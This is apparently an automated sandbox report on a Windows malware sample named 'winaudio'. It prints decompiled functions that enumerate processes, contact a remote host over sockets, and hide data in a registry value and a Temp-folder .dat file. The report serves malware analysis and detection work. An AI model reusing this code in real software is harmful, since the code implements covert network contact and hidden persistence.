				_t148 =  >  ? 0 : _t146 + 2;
				 *0x3ebb84 = _t148;
				 *0x3f0830 = _t148 & 0x00000019 | 0x000000e0; // executed
				 *0x39e1ec(_t183, 0,  &_v280, 0x104); // executed
				_t151 =  &_v280;
				_t173 = _t151 + 1;
				do {
					_t67 =  *_t151;
					_t151 = _t151 + 1;
				} while (_t67 != 0);
				if(_t151 - _t173 < 4) {
					E0037E1A0(_t175,  &_v280, 0, 0x104);
					E002D6370(__ebx, _t183,  &_v280, _t175, _t183);
					_t190 = _t190 + 0xc;
				}
				CloseHandle(_t183);
				_t153 =  &_v280;
				 *0x3f0830 = 0x7ff7;
				_t172 = _t153 + 1;
				do {
					_t69 =  *_t153;
					_t153 = _t153 + 1;
				} while (_t69 != 0);
				if(_t153 - _t172 >= 4) {
					E00383728( &_v280, 0, 0, 0, 0,  &_v740, 0x104, 0, 0);
					_t155 =  &_v740;
					_t191 = _t190 + 0x24;
					_t172 = _t155 + 1;
					do {
						_t73 =  *_t155;
						_t155 = _t155 + 1;
						__eflags = _t73;
					} while (_t73 != 0);
					__eflags = _t155 - _t172 - 1;
					if(_t155 - _t172 <= 1) {
						L15:
						_t74 =  *0x3ebb58; // 0xcc
						_t75 = _t74 + 2;
						__eflags = _t75 - 0x1490;
						_t76 =  >  ? 0 : _t75;
						 *0x3ebb58 = _t76;
						 *0x3f0830 = _t76 & 0x00000019 | 0x000000e0;
						_t81 = GetFileVersionInfoSizeA( &_v280,  &_v804); // executed
						_t177 = _t81;
						__eflags = _t177;
						if(__eflags == 0) {
							goto L27;
						}
						_t178 = _t177 + 0x10;
						_t21 = _t178 + 1; // -15
						_t141 = _t21;
						_push(_t21);
						_t184 = E002E0A70(_t172, _t183, __eflags);
						_t192 = _t191 + 4;
						__eflags = _t184;
						if(_t184 == 0) {
							goto L27;
						}
						E0037E1A0(_t178, _t184, 0, _t141);
						_t193 = _t192 + 0xc;
						_t85 = GetFileVersionInfoA( &_v280, 0, _t178, _t184); // executed
						__eflags = _t85;
						if(_t85 == 0) {
							_t86 =  *0x3ebb34; // 0x6556
							_t87 = _t86 + 2;
							__eflags = _t87 - 0x1490;
							_t88 =  >  ? 0 : _t87;
							 *0x3ebb34 = _t88;
							_t90 = _t88 & 0x00000019 | 0x000000e0;
							__eflags = _t90;
							 *0x3f0830 = _t90;
							L26:
							L002E086C(_t184);
							goto L27;
						}
						_v796 = 0;
						E0037E1A0(_t178,  &_v480, 0, 0xc8);
						_t179 =  *0x39e210;
						_t193 = _t193 + 0xc;
						_v792 = 0;
						_t96 =  *_t179(_t184, "\\VarFileInfo\\Translation",  &_v792,  &_v796);
						__eflags = _t96;
						if(_t96 == 0) {
							 *0x3f0830 = 0x7ff7;
							goto L26;
						}
						_t97 =  *0x3ebb18; // 0xcc
						_t98 = _t97 + 2;
						__eflags = _t98 - 0x1490;
						_t99 =  >  ? 0 : _t98;
						_t160 = _v792;
						 *0x3ebb18 = _t99;
						 *0x3f0830 = _t99 & 0x00000019 | 0x000000e0;
						E002D5BF0(_v792,  &_v480, 0xc8, "%04x%04x\\",  *_t160 & 0x0000ffff);
						E002D1B70( &_v764, _t179, "\\StringFileInfo\\");
						_v8 = 0;
						E002D03A0(_t179,  &_v480);
						E002D03A0(_t179, "OriginalFilename");
						__eflags = _v744 - 0x10;
						_v800 = 0;
						_t111 =  >=  ? _v764 :  &_v764;
						_t112 =  *_t179(_t184,  >=  ? _v764 :  &_v764,  &_v800,  &_v796,  *(_v792 + 2) & 0x0000ffff);
						__eflags = _t112;
						if(_t112 == 0) {
							_t113 = GetLastError();
							__eflags = _t113;
							if(_t113 != 0) {
								_t117 =  *0x3ebb20; // 0x1c
								_t118 = _t117 + 2;
								__eflags = _t118 - 0x1490;
								_t119 =  >  ? 0 : _t118;
								 *0x3ebb20 = _t119;
								_t121 = _t119 & 0x00000019 | 0x000000e0;
								__eflags = _t121;
								 *0x3f0830 = _t121;
							}
							L002E086C(_t184);
							E002D0420(_t141,  &_v764, _t179);
						} else {
							E002D1B70( &_v788, _t179, _v800);
							_v8 = 1;
							L002E086C(_t184);
							__eflags = _v768 - 0x10;
							_t125 =  >=  ? _v788 :  &_v788;
							E002D5F30(_t141, _t179,  >=  ? _v788 :  &_v788);
							asm("sbb esi, esi");
							E002D0420(_t141,  &_v788, _t179);
							E002D0420(_t141,  &_v764, _t179);
						}
						goto L28;
					}
					_t132 = E002D5F30(_t139, _t175,  &_v740);
					__eflags = _t132;
					if(_t132 == 0) {
						goto L15;
					}
					goto L28;
				}
				GetLastError();
				goto L28;
			}
































































                        0x002d65c0
                        0x002d65c0
                        0x002d65c3
                        0x002d65c5
                        0x002d65d0
                        0x002d65d7
                        0x002d65dc
                        0x002d65de
                        0x002d65e1
                        0x002d65e3
                        0x002d65e4
                        0x002d65e8
                        0x002d65ee
                        0x002d65ff
                        0x002d6609
                        0x002d661c
                        0x002d6621
                        0x002d6627
                        0x002d69bb
                        0x002d69bb
                        0x002d69bd
                        0x002d69c0
                        0x002d69c9
                        0x002d69d8
                        0x002d69d8
                        0x002d663b
                        0x002d663f
                        0x00000000
                        0x00000000
                        0x002d6645
                        0x002d665b
                        0x002d6664
                        0x002d6677
                        0x002d667d
                        0x002d6683
                        0x002d6689
                        0x002d6690
                        0x002d6690
                        0x002d6692
                        0x002d6693
                        0x002d669c
                        0x002d66ac
                        0x002d66bc
                        0x002d66c1
                        0x002d66c1
                        0x002d66c5
                        0x002d66cb
                        0x002d66d1
                        0x002d66db
                        0x002d66e0
                        0x002d66e0
                        0x002d66e2
                        0x002d66e3
                        0x002d66ec
                        0x002d671b
                        0x002d6720
                        0x002d6726
                        0x002d6729
                        0x002d6730
                        0x002d6730
                        0x002d6732
                        0x002d6733
                        0x002d6733
                        0x002d6739
                        0x002d673c
                        0x002d6758
                        0x002d6758
                        0x002d675f
                        0x002d6762
                        0x002d6767
                        0x002d676a
                        0x002d6777
                        0x002d678a
                        0x002d6790
                        0x002d6792
                        0x002d6794
                        0x00000000
                        0x00000000
                        0x002d679a
                        0x002d679d
                        0x002d679d
                        0x002d67a0
                        0x002d67a6
                        0x002d67a8
                        0x002d67ab
                        0x002d67ad
                        0x00000000
                        0x00000000
                        0x002d67b7
                        0x002d67bc
                        0x002d67ca
                        0x002d67d0
                        0x002d67d2
                        0x002d698e
                        0x002d6995
                        0x002d6998
                        0x002d699d
                        0x002d69a0
                        0x002d69a8
                        0x002d69a8
                        0x002d69ad
                        0x002d69b2
                        0x002d69b3
                        0x00000000
                        0x002d69b8
                        0x002d67e3
                        0x002d67f0
                        0x002d67f5
                        0x002d6801
                        0x002d6804
                        0x002d681c
                        0x002d681e
                        0x002d6820
                        0x002d6982
                        0x00000000
                        0x002d6982
                        0x002d6826
                        0x002d682d
                        0x002d6830
                        0x002d6835
                        0x002d6838
                        0x002d683e
                        0x002d684b
                        0x002d686a
                        0x002d687d
                        0x002d6888
                        0x002d6896
                        0x002d68a6
                        0x002d68ab
                        0x002d68bf
                        0x002d68cf
                        0x002d68d9
                        0x002d68db
                        0x002d68dd
                        0x002d693a
                        0x002d6940
                        0x002d6942
                        0x002d6944
                        0x002d694b
                        0x002d694e
                        0x002d6953
                        0x002d6956
                        0x002d695e
                        0x002d695e
                        0x002d6963
                        0x002d6963
                        0x002d6969
                        0x002d6979
                        0x002d68df
                        0x002d68eb
                        0x002d68f1
                        0x002d68f5
                        0x002d6903
                        0x002d690a
                        0x002d6912
                        0x002d691f
                        0x002d6923
                        0x002d692e
                        0x002d6933
                        0x00000000
                        0x002d68dd
                        0x002d6745
                        0x002d674a
                        0x002d674c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d674e
                        0x002d66ee
                        0x00000000

                        APIs
                        • OpenProcess.KERNEL32(0000042A,00000000,?,?,?,847B54EE), ref: 002D6635
                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?,847B54EE), ref: 002D667D
                        • CloseHandle.KERNEL32(00000000,?,?,847B54EE), ref: 002D66C5
                        • GetLastError.KERNEL32(?,?,847B54EE), ref: 002D66EE
                        • GetFileVersionInfoSizeA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,847B54EE), ref: 002D678A
                        • GetFileVersionInfoA.KERNELBASE(?,00000000,-00000010,00000000), ref: 002D67CA
                        • 73EE1500.VERSION(00000000,\VarFileInfo\Translation,00000000,00000000), ref: 002D681C
                        • 73EE1500.VERSION(00000000,?,?,00000000,OriginalFilename,?,\StringFileInfo\), ref: 002D68D9
                        • GetLastError.KERNEL32 ref: 002D693A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: File$E1500ErrorInfoLastVersion$CloseHandleModuleNameOpenProcessSize
                        • String ID: %04x%04x\$OriginalFilename$\StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 702377616-1682685862
                        • Opcode ID: 5bb2cffd3423d0fd98965fcdd900174f7f3fdc0a2caf305e32e144cb8483b328
                        • Instruction ID: 60f9db64909c07ead285385c231f19460236d6fcd6d44ff677ffa32b4bc0981e
                        • Opcode Fuzzy Hash: 5bb2cffd3423d0fd98965fcdd900174f7f3fdc0a2caf305e32e144cb8483b328
                        • Instruction Fuzzy Hash: B4B13A719501199BEB26DF24CC96FEEB3BCEB04704F4005A6E509E7291DB749E84CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037B7E0 Relevance: 21.2, APIs: 14, Instructions: 175networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 690 37b7e0-37b812 gethostbyname 691 37b814-37b825 call 2e056d 690->691 692 37b828-37b83a socket 690->692 694 37b9b6-37b9c8 call 2e056d 692->694 695 37b840-37b861 setsockopt 692->695 698 37b867-37b881 setsockopt 695->698 699 37b8fc-37b915 closesocket call 2e056d 695->699 698->699 700 37b883-37b8b3 htons inet_addr connect 698->700 703 37b8b5-37b8cf connect 700->703 704 37b8d1-37b8e2 send 700->704 703->699 703->704 704->699 706 37b8e4-37b8fa call 380789 704->706 706->699 709 37b918-37b939 call 37e1a0 recv 706->709 712 37b965-37b972 closesocket 709->712 713 37b93b 709->713 714 37b974-37b986 call 37c690 call 380508 712->714 715 37b9ad-37b9b3 call 380508 712->715 716 37b940-37b943 713->716 725 37b98b-37b9a3 call 2e056d 714->725 715->694 716->712 719 37b945-37b94d 716->719 722 37b9a6-37b9a7 closesocket 719->722 723 37b94f-37b963 recv 719->723 722->715 723->712 723->716
                        APIs
                        • gethostbyname.WS2_32(00000000), ref: 0037B808
                        • socket.WS2_32(00000002,00000001,00000000), ref: 0037B82F
                        • setsockopt.WS2_32(00000000,0000FFFF,00001005,00000000,00000004), ref: 0037B858
                        • setsockopt.WS2_32(00000000,0000FFFF,00001006,0002BF20,00000004), ref: 0037B878
                        • htons.WS2_32(?), ref: 0037B88F
                        • inet_addr.WS2_32(00000000), ref: 0037B89A
                        • connect.WS2_32(00000000,?,00000010), ref: 0037B8AA
                        • connect.WS2_32(00000000,?,00000010), ref: 0037B8C6
                        • send.WS2_32(00000000,0037AE32,?,00000000), ref: 0037B8DA
                        • closesocket.WS2_32(00000000), ref: 0037B8FD
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: connectsetsockopt$closesocketgethostbynamehtonsinet_addrsendsocket
                        • String ID:
                        • API String ID: 3935686447-0
                        • Opcode ID: 7d7057362cbdbacb7d36f9526bb44ac9ad3b55d6b843c920cf9e7a5916ce5f2f
                        • Instruction ID: be7a54a5f43b3873dc1b5878e6228c4589da911688bfdba697402805f4262b67
                        • Opcode Fuzzy Hash: 7d7057362cbdbacb7d36f9526bb44ac9ad3b55d6b843c920cf9e7a5916ce5f2f
                        • Instruction Fuzzy Hash: 77512971A40208ABCB32EFA49CC5FBEB77CEF09720F000215FA16EA1D1D77489569B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DA510 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 99registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 91%
                        			E002DA510(char** __ecx, intOrPtr* __edx) {
				int _v8;
				void* _v12;
				int _v16;
				char** _v20;
				void* __edi;
				long _t20;
				int _t28;
				intOrPtr* _t45;
				char* _t47;

				_t43 = __ecx;
				_t45 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				if(__edx != 0) {
					_t20 = RegOpenKeyExA(0x80000001, "Software\\Licenses", 0, 0x20019,  &_v12); // executed
					if(_t20 != 0) {
						GetLastError();
						return 0;
					} else {
						_v16 = _t20;
						_v8 = _t20;
						RegQueryValueExA(_v12, "{Z3CD-FA87-B5E6-0SYI}", 0,  &_v16, 0,  &_v8);
						if(_v16 != 3) {
							L10:
							RegCloseKey(_v12);
							return 0;
						} else {
							_t28 = _v8;
							if(_t28 == 0) {
								goto L10;
							} else {
								_push(_t28);
								_t47 = E00380789(_t43);
								if(_t47 == 0) {
									L9:
									goto L10;
								} else {
									E0037E1A0(_t45, _t47, 0, _v8);
									if(RegQueryValueExA(_v12, "{Z3CD-FA87-B5E6-0SYI}", 0,  &_v16, _t47,  &_v8) != 0) {
										L00380508(_t47);
										GetLastError();
										goto L9;
									} else {
										 *_v20 = _t47;
										 *_t45 = _v8;
										RegCloseKey(_v12);
										return 1;
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
			}












                        0x002da510
                        0x002da518
                        0x002da51a
                        0x002da51f
                        0x002da528
                        0x002da547
                        0x002da54f
                        0x002da5fc
                        0x002da609
                        0x002da555
                        0x002da555
                        0x002da558
                        0x002da56f
                        0x002da579
                        0x002da5eb
                        0x002da5ee
                        0x002da5fb
                        0x002da57b
                        0x002da57b
                        0x002da580
                        0x00000000
                        0x002da582
                        0x002da583
                        0x002da589
                        0x002da590
                        0x002da5ea
                        0x00000000
                        0x002da592
                        0x002da598
                        0x002da5bb
                        0x002da5dc
                        0x002da5e4
                        0x00000000
                        0x002da5bd
                        0x002da5c2
                        0x002da5cb
                        0x002da5cd
                        0x002da5da
                        0x002da5da
                        0x002da5bb
                        0x002da590
                        0x002da580
                        0x002da579
                        0x002da52b
                        0x002da531
                        0x002da531

                        APIs
                        • RegOpenKeyExA.KERNEL32(80000001,Software\Licenses,00000000,00020019,00000000), ref: 002DA547
                        • RegQueryValueExA.ADVAPI32(00000000,{Z3CD-FA87-B5E6-0SYI},00000000,?,00000000,?), ref: 002DA56F
                        • RegQueryValueExA.ADVAPI32(00000000,{Z3CD-FA87-B5E6-0SYI},00000000,00000003,00000000,?), ref: 002DA5B3
                        • RegCloseKey.ADVAPI32(00000000), ref: 002DA5CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: QueryValue$CloseOpen
                        • String ID: Software\Licenses${Z3CD-FA87-B5E6-0SYI}
                        • API String ID: 1586453840-4015627739
                        • Opcode ID: 6598f5d262b436c377806b6346331803ff34593def7d1714295df66d3787ad28
                        • Instruction ID: 6164d96f0cacf83ff506f297f40ade47e5d2152bb201a69e241753a03008042a
                        • Opcode Fuzzy Hash: 6598f5d262b436c377806b6346331803ff34593def7d1714295df66d3787ad28
                        • Instruction Fuzzy Hash: ED318076D40219BBDB12DF96EC45BEEFBBCEB05311F1001A3F808E6250E7725A249B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DA2F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E002DA2F0() {
				void* _v8;
				char* _v12;
				void* __ebx;
				void* __edi;
				char* _t10;
				long _t12;
				long _t13;
				void* _t16;
				long _t20;
				int _t28;

				_t10 =  *0x3f097c; // 0x3b69fc8
				_t28 =  *0x3f0874; // 0x1b1dd
				_t23 = 1;
				_v12 = _t10;
				_v8 = 0;
				_t12 = RegOpenKeyExA(0x80000001, "Software\\Licenses", 0, 0xf003f,  &_v8); // executed
				if(_t12 == 0) {
					L3:
					_t13 = RegSetValueExA(_v8, "{Z3CD-FA87-B5E6-0SYI}", 0, 3, _v12, _t28); // executed
					if(_t13 != 0) {
						_t23 = 0;
						GetLastError();
					}
					RegCloseKey(_v8);
					if(_t23 != 0) {
						return 1;
					} else {
						_t16 = E002DA1B0(_t23, _v12, _t28, _t28); // executed
						return _t16;
					}
				} else {
					_t23 = 0;
					GetLastError();
					_t20 = RegCreateKeyA(0x80000001, "Software\\Licenses",  &_v8); // executed
					if(_t20 == 0) {
						goto L3;
					} else {
						GetLastError();
						return E002DA1B0(0, _v12, _t28, _t28);
					}
				}
			}













                        0x002da2f6
                        0x002da2fe
                        0x002da304
                        0x002da306
                        0x002da31e
                        0x002da325
                        0x002da333
                        0x002da364
                        0x002da374
                        0x002da37c
                        0x002da37e
                        0x002da380
                        0x002da380
                        0x002da385
                        0x002da38d
                        0x002da3a8
                        0x002da38f
                        0x002da394
                        0x002da39f
                        0x002da39f
                        0x002da335
                        0x002da335
                        0x002da337
                        0x002da347
                        0x002da34f
                        0x00000000
                        0x002da351
                        0x002da351
                        0x002da363
                        0x002da363
                        0x002da34f

                        APIs
                        • RegOpenKeyExA.KERNEL32(80000001,Software\Licenses,00000000,000F003F,?), ref: 002DA325
                        • GetLastError.KERNEL32 ref: 002DA337
                        • RegCreateKeyA.ADVAPI32(80000001,Software\Licenses,00000000), ref: 002DA347
                        • GetLastError.KERNEL32 ref: 002DA351
                          • Part of subcall function 002DA1B0: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 002DA22B
                          • Part of subcall function 002DA1B0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002DA270
                          • Part of subcall function 002DA1B0: GetLastError.KERNEL32(?,?,?,00000000), ref: 002DA27A
                          • Part of subcall function 002DA1B0: CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 002DA281
                        • RegSetValueExA.KERNEL32(00000000,{Z3CD-FA87-B5E6-0SYI},00000000,00000003,?,0001B1DD), ref: 002DA374
                        • GetLastError.KERNEL32 ref: 002DA380
                        • RegCloseKey.ADVAPI32(00000000), ref: 002DA385
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast$CloseCreateFile$HandleOpenValueWrite
                        • String ID: Software\Licenses${Z3CD-FA87-B5E6-0SYI}
                        • API String ID: 2085557971-4015627739
                        • Opcode ID: 54bfab03245a79487a1cda2790f4092d8e8e4eaae8168812ccf953f2c9f82be0
                        • Instruction ID: bd41458204397d372532163064cd84ffe3fd51c458183e764180830225a435e5
                        • Opcode Fuzzy Hash: 54bfab03245a79487a1cda2790f4092d8e8e4eaae8168812ccf953f2c9f82be0
                        • Instruction Fuzzy Hash: 1611E631B40118BBDB119FAAAC45FEEBB6DEB41711F140097E908A3350DB729D14DAA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DA1B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 70%
                        			E002DA1B0(void* __ebx, void* __ecx, long __edx, void* __edi) {
				signed int _v8;
				char _v268;
				long _v272;
				void* __esi;
				signed int _t12;
				void* _t21;
				signed int _t25;
				signed int _t27;
				int _t31;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				signed int _t60;

				_t52 = __edx;
				_t42 = __ecx;
				_t12 =  *0x3e1008; // 0x847b54ee
				_v8 = _t12 ^ _t60;
				_t54 = __ecx;
				_v272 = __edx;
				if(__ecx == 0 || __edx < 1) {
					return E002E056D(_v8 ^ _t60, _t52, _t55);
				} else {
					_push(_t55);
					E0037E1A0(__ecx,  &_v268, 0, 0x104);
					E002D5BF0(_t42,  &_v268, 0x104, "C:\\Windows\\Temp\\%s", "5B7C84755D8041139A7AEBA6F4E5912F.dat");
					_t21 = CreateFileA( &_v268, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
					_t56 = _t21;
					if(_t56 == 0 || _t56 == 0xffffffff) {
						GetLastError();
						_pop(_t57);
						return E002E056D(_v8 ^ _t60, _t52, _t57);
					} else {
						_t25 =  *0x3ebbb8; // 0x0
						_t27 =  >  ? 0 : _t25 + 2;
						 *0x3ebbb8 = _t27;
						 *0x3f0830 = _t27 & 0x00000019 | 0x000000e0;
						_t31 = WriteFile(_t56, _t54, _v272,  &_v272, 0); // executed
						if(_t31 != 0) {
							CloseHandle(_t56);
							_pop(_t58);
							return E002E056D(_v8 ^ _t60, _t52, _t58);
						} else {
							GetLastError();
							CloseHandle(_t56);
							_pop(_t59);
							return E002E056D(_v8 ^ _t60, _t52, _t59);
						}
					}
				}
			}



















                        0x002da1b0
                        0x002da1b0
                        0x002da1b9
                        0x002da1c0
                        0x002da1c5
                        0x002da1c7
                        0x002da1d1
                        0x002da2e0
                        0x002da1e0
                        0x002da1e0
                        0x002da1ef
                        0x002da20a
                        0x002da22b
                        0x002da231
                        0x002da235
                        0x002da2b6
                        0x002da2bc
                        0x002da2ce
                        0x002da23c
                        0x002da23c
                        0x002da24c
                        0x002da24f
                        0x002da25c
                        0x002da270
                        0x002da278
                        0x002da29d
                        0x002da2a3
                        0x002da2b5
                        0x002da27a
                        0x002da27a
                        0x002da281
                        0x002da287
                        0x002da299
                        0x002da299
                        0x002da278
                        0x002da235

                        APIs
                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 002DA22B
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002DA270
                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 002DA27A
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 002DA281
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 002DA29D
                        • GetLastError.KERNEL32 ref: 002DA2B6
                        Strings
                        • 5B7C84755D8041139A7AEBA6F4E5912F.dat, xrefs: 002DA1F4
                        • C:\Windows\Temp\%s, xrefs: 002DA1F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CloseErrorFileHandleLast$CreateWrite
                        • String ID: 5B7C84755D8041139A7AEBA6F4E5912F.dat$C:\Windows\Temp\%s
                        • API String ID: 7012363-3814355176
                        • Opcode ID: a3cff6b2e47538c6e1b4a45f5b2732b12a365987bf227a3ef9fe08d6fb4a1545
                        • Instruction ID: 5f0b6a7448a5b7651dc5ae878c2ea260925fdf78e44ad5dbee54fc3c67831a3d
                        • Opcode Fuzzy Hash: a3cff6b2e47538c6e1b4a45f5b2732b12a365987bf227a3ef9fe08d6fb4a1545
                        • Instruction Fuzzy Hash: 5D314E31A40118ABCB21DF66EC86BDEF3ACEB45710F400297F949D72C1DAF24D908E90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DA3B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E002DA3B0(void* __ebx, void** __ecx, long* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				long _v272;
				void** _v276;
				long* _v280;
				signed int _t16;
				void* _t24;
				signed int _t27;
				signed int _t29;
				long _t32;
				void* _t55;
				void* _t58;
				signed int _t59;

				_t57 = __esi;
				_t53 = __edx;
				_t46 = __ecx;
				_t16 =  *0x3e1008; // 0x847b54ee
				_v8 = _t16 ^ _t59;
				_v276 = __ecx;
				_v280 = __edx;
				if(__edx != 0) {
					_push(__edi);
					E0037E1A0(__edi,  &_v268, 0, 0x104);
					E002D5BF0(_t46,  &_v268, 0x104, "C:\\Windows\\Temp\\%s", "5B7C84755D8041139A7AEBA6F4E5912F.dat");
					_t24 = CreateFileA( &_v268, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_t55 = _t24;
					if(_t55 != 0 && _t55 != 0xffffffff) {
						_t27 =  *0x3ebba8; // 0x6556
						_t29 =  >  ? 0 : _t27 + 2;
						 *0x3ebba8 = _t29;
						 *0x3f0830 = _t29 & 0x00000019 | 0x000000e0;
						_t32 = GetFileSize(_t55, 0);
						_v272 = _t32;
						if(_t32 != 0) {
							_push(__esi);
							_push(_t32);
							_t58 = E00380789(0);
							if(_t58 != 0) {
								E0037E1A0(_t55, _t58, 0, _v272);
								if(ReadFile(_t55, _t58, _v272,  &_v272, 0) != 0) {
									 *_v276 = _t58;
									 *_v280 = _v272;
								} else {
									GetLastError();
									L00380508(_t58);
								}
							}
							_pop(_t57);
						}
						CloseHandle(_t55);
					}
					return E002E056D(_v8 ^ _t59, _t53, _t57);
				} else {
					return E002E056D(_v8 ^ _t59, __edx, __esi);
				}
			}
















                        0x002da3b0
                        0x002da3b0
                        0x002da3b0
                        0x002da3b9
                        0x002da3c0
                        0x002da3c5
                        0x002da3ce
                        0x002da3d6
                        0x002da3e9
                        0x002da3f8
                        0x002da413
                        0x002da434
                        0x002da43a
                        0x002da43e
                        0x002da44d
                        0x002da45d
                        0x002da460
                        0x002da46e
                        0x002da473
                        0x002da479
                        0x002da481
                        0x002da483
                        0x002da484
                        0x002da48a
                        0x002da491
                        0x002da49c
                        0x002da4bd
                        0x002da4de
                        0x002da4e6
                        0x002da4bf
                        0x002da4bf
                        0x002da4c6
                        0x002da4cb
                        0x002da4bd
                        0x002da4e8
                        0x002da4e8
                        0x002da4ea
                        0x002da4ea
                        0x002da501
                        0x002da3d8
                        0x002da3e8
                        0x002da3e8

                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002DA434
